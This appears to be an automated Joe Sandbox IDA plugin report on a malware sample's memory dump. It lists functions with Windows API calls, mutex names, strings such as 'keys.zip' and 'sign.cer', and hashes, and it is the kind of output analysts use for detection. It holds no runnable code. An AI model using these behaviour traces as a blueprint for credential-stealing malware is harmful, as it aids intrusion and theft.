                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-2898694334
                                                                                                                                                                                                              • Opcode ID: 0258e69f3f0e8069f1996b037d3d244aa65e7dc31f73c662ca012af580c7934a
                                                                                                                                                                                                              • Instruction ID: 138ae3e47ac7bd222f431fb104b80b9c9da8faa39f719ae95e6a90f7631b2538
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0258e69f3f0e8069f1996b037d3d244aa65e7dc31f73c662ca012af580c7934a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0F4306863056ED2327B569C1AF9ABBDC7B05B19F00801CF744A22C1CBE0A5008BBA
                                                                                                                                                                                                              Function 012FCB98 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 34sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 012FCBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FCBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012FCBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C0CB,BSS), ref: 012FCC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              • API String ID: 3206501308-1030087416
                                                                                                                                                                                                              • Opcode ID: d957d7f945c4bb0bf365706a0a56deb182c3130557f5ef2323f3594d133a3980
                                                                                                                                                                                                              • Instruction ID: 744831d7d31cfb5160bf6ff591056268d6af29cb333c8407aa4d071398f896fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d957d7f945c4bb0bf365706a0a56deb182c3130557f5ef2323f3594d133a3980
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0F63065A3196FD6327B60DC0AF9EB79C6F45B15F00411CFB55A22C5DBB485048B66
                                                                                                                                                                                                              Function 0130A280 Relevance: 18.9, APIs: 15, Instructions: 136COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              • Opcode ID: c8f44c9fb228695a0f699f16d70269a7d3ae973bec1059e5723f9ebdf8fa7d6c
                                                                                                                                                                                                              • Instruction ID: 02e5c2c43bbcd2552ac36a7d0accbe3edc2ae68a8af9d4430c37e7d1c84a6b24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8f44c9fb228695a0f699f16d70269a7d3ae973bec1059e5723f9ebdf8fa7d6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D41B0B0900711CBD732DFA8F890A5AB7ECBB84B14F9A0579E5594B748D331A840DFD5
                                                                                                                                                                                                              Function 012F1BD0 Relevance: 17.9, APIs: 14, Instructions: 355COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d7a8f8d4463b6708be10d72f8081fb5fb3d80875e49f8237a0d527f3b715b98d
                                                                                                                                                                                                              • Instruction ID: 7e15b99d97ef4228190250a55b0574d24f233519dc145b9c0c279abf245181f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7a8f8d4463b6708be10d72f8081fb5fb3d80875e49f8237a0d527f3b715b98d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62C10431A10617DFCB25CF28C894AAABBB5FF49340F5082ACEF569B345D731AA15C790
                                                                                                                                                                                                              Function 01305BB0 Relevance: 17.6, APIs: 14, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C71
                                                                                                                                                                                                              • memset.MSVCRT(000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C85
                                                                                                                                                                                                              • memset.MSVCRT(000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C97
                                                                                                                                                                                                              • memset.MSVCRT(00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305CA6
                                                                                                                                                                                                              • memset.MSVCRT(00000EE0,00000000,0000009C,00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000), ref: 01305CB8
                                                                                                                                                                                                              • memset.MSVCRT(00000FF0,00000000,000008F4,00000EE0,00000000,0000009C,00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000), ref: 01305CFC
                                                                                                                                                                                                              • memset.MSVCRT(000018EC,00000000,0000023D), ref: 01305D1D
                                                                                                                                                                                                              • memset.MSVCRT(00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D2F
                                                                                                                                                                                                              • memset.MSVCRT(00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D41
                                                                                                                                                                                                              • memset.MSVCRT(00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D50
                                                                                                                                                                                                              • memset.MSVCRT(00001EA0,00000000,00000078,00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D5F
                                                                                                                                                                                                              • memset.MSVCRT(00001F18,00000000,00008000,00001EA0,00000000,00000078,00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC), ref: 01305D71
                                                                                                                                                                                                              • memset.MSVCRT(00009F18,00000000,00010000), ref: 01305D86
                                                                                                                                                                                                              • memset.MSVCRT(00019F18,00000000,00001000,00009F18,00000000,00010000), ref: 01305D98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              • Opcode ID: 1347a9eda94685352da68b98ea0889dad22bcb530b6a4ab54b0bc887a48472a9
                                                                                                                                                                                                              • Instruction ID: 7ae43e0bca5be33fc6fd329bc123a1f9114e40f3237edfbaf909cb1b78f48163
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1347a9eda94685352da68b98ea0889dad22bcb530b6a4ab54b0bc887a48472a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36513EB1D41255AACF10DFA4C884BEA7BB8BF18344F04817AED0CAF286D7B45245CBE1
                                                                                                                                                                                                              Function 01303B40 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098), ref: 01303B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303BBB
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303BDB
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098,?,?), ref: 01303C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$#680CreateCurrentFolderMakeSystem
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1796575131-1274251082
                                                                                                                                                                                                              • Opcode ID: 63b9fa5cf8cfb48dd939901760284fd815d6e7eedb2792d8627ecb57836e0b92
                                                                                                                                                                                                              • Instruction ID: 889da161bdd776c71953bcb5d057825f8562560154ec0e08b859951241ce1a14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63b9fa5cf8cfb48dd939901760284fd815d6e7eedb2792d8627ecb57836e0b92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041E5702046554FCB36DF3998B8BEABBE8FF96304F148098E98AC7341DA71D948C794
                                                                                                                                                                                                              Function 012EC310 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 012EC31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EC354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 012EC362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 012EC36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012EC37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012EC383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 012EC38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 012EC3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EC3E3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3315380975-1167384825
                                                                                                                                                                                                              • Opcode ID: f940f12afe150d34d7947f82c4ce27a5a27f1b937d63a69bc9314a77ac7136ae
                                                                                                                                                                                                              • Instruction ID: 9d4805bd13a1c4dc00ca07b7b396b9d1b7c9a458d6001a44e16dd8189bbb2ad3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f940f12afe150d34d7947f82c4ce27a5a27f1b937d63a69bc9314a77ac7136ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC41D2B6211205ABDB24DFA9DC88DAB77ADEB8C711F00860DFA19D3244D634E950CBA0
                                                                                                                                                                                                              Function 012FF578 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 92filesynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CopyFileHandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                              • String ID: Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$sign.cer
                                                                                                                                                                                                              • API String ID: 2434762175-1812296212
                                                                                                                                                                                                              • Opcode ID: f515fcd6db2b73289838f169a3943e97c2ae6023d4b68c3989cbed27bebdb251
                                                                                                                                                                                                              • Instruction ID: f84b57d9e2e19efb4c099af7b844f359502e28b929f3a3fc19780b15a6819904
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f515fcd6db2b73289838f169a3943e97c2ae6023d4b68c3989cbed27bebdb251
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD3108315543465FD7325F289928F96BFD4AF5A705F19809CEB898F362DA70C008CB90
                                                                                                                                                                                                              Function 012E79E0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91threadstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012E7A0F
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                                • Part of subcall function 01304880: GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                                • Part of subcall function 01304880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012E7A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012E7A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012E7A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012E7A54
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E7A99
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,Global\HighMemoryEvent_%08x,?,?,00000000,00000103), ref: 012E7AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 012E7AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleInformation$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 9e2b3b2da$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 3631320848-992867637
                                                                                                                                                                                                              • Opcode ID: d9785f470e0c89c36576bc9914e6e0ef9de32965f8a363bc3634f45a48299b6c
                                                                                                                                                                                                              • Instruction ID: ea2984a5cb3676c7a4a41e2dbf3672011ea49e57c47f15ab7c79f9b091cc97a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9785f470e0c89c36576bc9914e6e0ef9de32965f8a363bc3634f45a48299b6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A63182725102169BE730DE94DC49BAAB7ACEF44B11F544049FF4497380E7F0AA84CBE0
                                                                                                                                                                                                              Function 013050F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000DE,00000000,00000000), ref: 01305124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0130513A
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000), ref: 01305169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130516F
                                                                                                                                                                                                                • Part of subcall function 012F41E0: GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                                • Part of subcall function 012F41E0: HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                                • Part of subcall function 012F41E0: memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104,00000104,?,?,?,?,00000000,00000000), ref: 01305190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 01305100
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              • Opcode ID: 41e604e1df03dae4893170020faeb91e86d99d3a6ef5727464ed8c128f6e2208
                                                                                                                                                                                                              • Instruction ID: a3207f995ac337586f42cea6f164ba4bca8f486f84fded5df9d256afb5140965
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41e604e1df03dae4893170020faeb91e86d99d3a6ef5727464ed8c128f6e2208
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75213871900215A7DF27AA689C44BFBB7FC9F84705F200458FA45971C4EBB0AA008BA0
                                                                                                                                                                                                              Function 012F2570 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(01339F08,00000000,00000104,774CF550,00000000), ref: 012F2587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,774CF550,00000000), ref: 012F259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,774CF550,00000000), ref: 012F25AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,774CF550,00000000), ref: 012F25E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(01339F08,00000000,00000104,00000000,00000001,?,774CF550,00000000), ref: 012F2611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,774CF550,00000000), ref: 012F2620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,774CF550,00000000), ref: 012F2623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,774CF550,00000000), ref: 012F2630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,774CF550,00000000), ref: 012F2633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 9e2b3e8fa
                                                                                                                                                                                                              • API String ID: 780088666-1329805938
                                                                                                                                                                                                              • Opcode ID: 214b8bc4f0422a1c2da4e93a6eb0065b23223fd70ace9b667bdc76f2105f84da
                                                                                                                                                                                                              • Instruction ID: 70ce79c5cc7221b08417ad1dfb44fcd9e35007ba0a6d3fd9283fabe7a6a03997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 214b8bc4f0422a1c2da4e93a6eb0065b23223fd70ace9b667bdc76f2105f84da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE110671640315A7DB316A385C1DFEBBA6CAB91B12F004158F785EB2C0DEE0D9848BE4
                                                                                                                                                                                                              Function 01305390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
